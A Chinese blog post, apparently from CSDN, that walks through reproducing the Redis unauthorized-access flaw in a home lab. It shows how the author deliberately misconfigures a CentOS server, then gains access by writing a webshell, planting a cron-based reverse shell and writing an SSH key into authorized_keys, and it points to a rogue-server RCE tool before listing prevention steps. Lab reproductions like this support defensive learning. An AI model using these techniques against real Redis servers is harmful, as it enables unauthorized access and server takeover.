Redis未授权访问漏洞复现及利用

最新推荐文章于 2024-07-25 20:24:31 发布
最新推荐文章于 2024-07-25 20:24:31 发布
阅读量644 收藏 3
点赞数 1
分类专栏: 漏洞复现 文章标签: redis 安全漏洞 centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25649867/article/details/115036997
版权

Redis未授权访问漏洞复现及利用

一、Redis相关介绍

Redis是完全开源的,遵守BSD协议,是一个高性能的key-value数据库。

应用场景

在Java web中主要有两个应用场景:

  • 存储、缓存用的数据
  • 需要高速读写的场合使用它快速读写

常用语法

  • 连接命令(可远程操作,需要对配置文件进行更改)
redis-cli -h <host> -p <port> -a <password>
参数含义
-h主机IP
-P主机端口
-aRedis服务密码
  • set key value

设置指定的key值。key为自定义的变量名;value为赋值的内容,可以为数字,字符串。

  • get key

获取指定的key值

  • keys *

获取当前数据库中所有的key

  • config set dir /XXX/XXX/XX

设置工作目录,必须是绝对路径,而且已经存在

  • config set dbfilename xxx

设置备份文件名

  • save

进行备份

  • flushall

删除所有数据

漏洞发现

二、漏洞复现

整个过程中,使用的是Centos 7,Redis选择的是6.2.1版本。

环境搭建

Centos 7 环境配置

首先安装Apache和PHP,为后续的webshell做铺垫。

安装Apache
sudo yum -y install httpd

打开防火墙的80端口,允许访问

sudo firewall-cmd --permanent --zone=public --add-service=http
sudo firewall-cmd --reload

设置开机启动

sudo systemctl enable httpd

Apache的配置文件位于:/etc/httpd/conf中的httpd.conf文件

配置可以解析PHP,在配置文件中添加

<FilesMatch \.php$>
    SetHandler application/x-httpd-php
</FilesMatch>

重启Apache服务

systemctl restart httpd
安装PHP

因yum源中,不包含PHP相关内容,所以需要更改下yum源

sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm
sudo rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm

对yum源进行一下升级,更新一下软件包

sudo yum -y upgrade

安装PHP

sudo yum -y install php72w
sudo yum install php72w-common php72w-fpm php72w-opcache php72w-gd php72w-mysqlnd php72w-mbstring php72w-pecl-redis php72w-pecl-memcached php72w-devel

以上内容还包括了一些开发所使用的包,不用第二条命令应该也是可以的。

重启Apache服务

systemctl restart httpd

对上述环境进行一下验证

直接通过IP访问,出现下图说明Apache安装并配置成功

1

进入Apache默认网络应用路径/var/www/html,创建t.php文件,内容如下:

<?php echo phpinfo();?>

通过IP/t.php访问,出现下图,说明Apache已经可以解析PHP文件,并且PHP安装并配置成功。

2

安装Redis
  • 升级GCC
sudo yum -y install centos-release-scl
sudo yum -y install devtoolset-9-gcc devtoolset-9-gcc-c++ devtoolset-9-binutils
sudo scl enable devtoolset-9 bash

可以用gcc --version来查看更新之后的版本

[root@localhost local]# gcc --version
gcc (GCC) 9.3.1 20200408 (Red Hat 9.3.1-2)
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  • 安装tcl
sudo yum install tcl
  • 安装Redis
wget https://download.redis.io/releases/redis-6.2.1.tar.gz
tar zxvf redis-6.2.1.tar.gz
cd redis-6.2.1/
make
make test	
make install

开放防火墙的Redis的服务端口,否则无法允许其他IP进行访问

sudo firewall-cmd --permanent --zone=public --add-service=redis
sudo firewall-cmd --reload
  • 配置Redis(允许远程链接,并且允许无密码登录)

配置文件目录:redis-6.2.1/文件夹中的redis.conf文件。

  1. 取消IP绑定,允许除主机之外的机器远程登录Redis

查看bind 127.0.0.1,前面是否有#,若没有则添加。

3

  1. 关闭保护模式

protected-mode yes,修改为protected-mode no

在Redis3.2版本以前,不具备该参数,可以忽略。

4
执行redis-server开启Redis服务,出现如下图内容,说明安装成功

5
使用虚拟机的各位,记得保存快照哦!!!!!

漏洞利用准备

kali安装Redis

这里使用6.2.1版本也是没问题的,只不过我之前配好了6.0.3版本之后才发现还有6.2.1这个更新的版本。

wget http://download.redis.io/releases/redis-6.0.3.tar.gz
tar -zxvf redis-6.0.3.tar.gz
cd redis-6.0.3/
make
make test
cd src
cp redis-cli /usr/bin

执行make,make test都需要较长的时间,稍安勿躁。

以上命令全部执行完毕之后,打开两个终端,分别执行:

redis-server 
redis-cli

14
15

出现上述结果,在kali中安装Redis就是成功了。

windows安装Redis

微软老大哥已经为我们准备好了windows版的Redis,直接安装使用,或者解压即可。

链接:https://github.com/MicrosoftArchive/redis/releases

我在这里选择的是使用压缩包。

16

解压后,在对应的目录下执行:

.\redis-server.exe redis.windows.conf

17

出现上述结果,即使成功安装。

三、未授权访问漏洞利用

保持centos一直开始Apache、Redis的状态

操作机IP
攻击机:kali192.168.1.6
攻击机:win10192.168.1.100
目标机:centos 7192.168.1.11

centos7 开启Redis的时候需要执行

redis-server /usr/local/redis-6.2.1/redis.conf

通过使用上述命令,来通过配置文件的内容启动Redis服务。如果仅仅使用redis-serverprotected-mode的结果还是yes,将无法进行操作。

使用较低版本的Redis不会出现这一情况。

webshell

  1. 远程连接Redis

6

  1. 写入webshell

18

使用浏览器,访问192.168.1.11/shell.php,可以看到页面返回的内容,不过有一些乱码。

  1. 使用webshell管理工具进行连接

我这里选择使用的是蚂剑,如果其他的菜刀不行,可以多换几把刀,多试试。

7

8

可以看到蚁剑已经成功链接到了靶机。

反弹shell

  1. 创建定时任务

9

  1. 开启nc,监听9999端口,耐心等待1分钟,查看靶机信息。

10

写公钥

如果系统没有使用过root权限进行ssh登陆的话,是不存在/root/.ssh文件夹的。

首次需要执行sudo ssh localhost,输入root用户密码后,成功使用root权限进行ssh登陆,并自动创建.ssh文件夹

  • 创建、查看公钥
ssh-keygen -t rsa
cd /root/.ssh
cat id_rsa.pub
  • 在公钥前后添加空行,防止有其他数据污染,并重定向到一个新文件中(文件名可自由定义)
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/key.txt
  • 向目标机的Redis中写入key-value值(pubkey,可自由命名)
cat /tmp/key.txt | redis-cli -h 192.168.1.100 -p 6379 -x set pubkey

11

  • 将公钥内容写在authorized_keys文件中

12

  • 攻击机采用ssh,远程登录到目标机

13

需要退出ssh登录的话,使用命令logout

主从复制RCE

这里主要是使用redis-rogue-server的项目脚本,里面的使用情况说明的比较详细。

https://github.com/Dliv3/redis-rogue-server

因没有外网的vps,没有进行尝试。

四、预防措施

  • 尽可能使用稳定的高版本Redis
    在整个文档的记录过程中,尝试过从3.X版本到6.X版本,越新的版本对于默认配置更加的严格,甚至已经将protected-mode改为了no,如果仅仅使用redis-server启动服务,会自动将protected-mode变为yes
  • 谨慎修改配置文件,以白名单的形式来允许远程访问
  • 为Redis配置密码,使用密码进行登录
  • 在防火墙中设置好白名单和过滤
  • 修改服务的默认端口

五、其他问题

在整个过程中,也使用过ubuntu,但是反弹shell一直都无法正常的反弹。最终更换使用了centos7,反弹shell这一部分是没有问题的,可以的到正常的结果。

推测是因为ubuntu没有配置邮件服务导致的crontab没有正常执行,因个人技术有限,还是没能解决这一问题。欢迎大佬们多多交流。

Lilin_27
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Redis授权访问漏洞复现(三种方式)
weixin_55843787的博客
03-29 9428
redis授权访问漏洞
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
redis授权访问漏洞复现
zkaqlaoniao的博客
06-27 404
攻击者在授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
Redis授权访问漏洞复现
weixin_55123346的博客
06-26 1094
Redis漏洞复现
Redis授权访问漏洞复现利用
Forget_liu的博客
06-07 2427
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
漏洞复现Redis授权访问
m0_56190544的博客
09-13 2148
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
redis攻防笔记-授权访问漏洞复现利用
NoooEmotion的博客
01-31 565
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。
Redis授权访问漏洞复现与工具安装
Welcome To Myon'Blog !
01-11 2208
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
Redis授权访问漏洞搭建复现
m0_58595840的博客
01-05 2768
Redis授权访问漏洞利用方式总结(含靶场搭建)
Redis授权漏洞复现利用(window,linux)
热门推荐
dreamthe的博客
03-22 1万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
redis的使用场景
最新发布
m0_64821020的博客
07-25 1064
[1]热点数据的缓存 [2]分布式锁 [3]短信业务(登录注册时)
redis基本数据类型
sinat_16493273的博客
07-24 998
Redis提供了多种数据类型,可以用作缓存、消息队列、事件处理,集合运算、分布式协调等。
Springboot实现缓存组件(ctgcache、redis)配置动态切换
qq_45443475的博客
07-25 538
其实整体实现是一个比较简单的过程,核心是需要了解Springboot中@Conditional注解的应用,希望对大家有所帮助。
Redis使用场景-热点数据缓存
R202471的博客
07-25 438
为了把一些经常访问的数据放入缓存中已减少对数据库的访问,从而减少数据库的压力,提高程序的性能。【内存中存储】-效率快。
Redis授权访问漏洞
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止公网访问:将Redis服务器部署在内网中,并禁止对公网开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis的安全补丁,以修复已知漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lilin_27

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值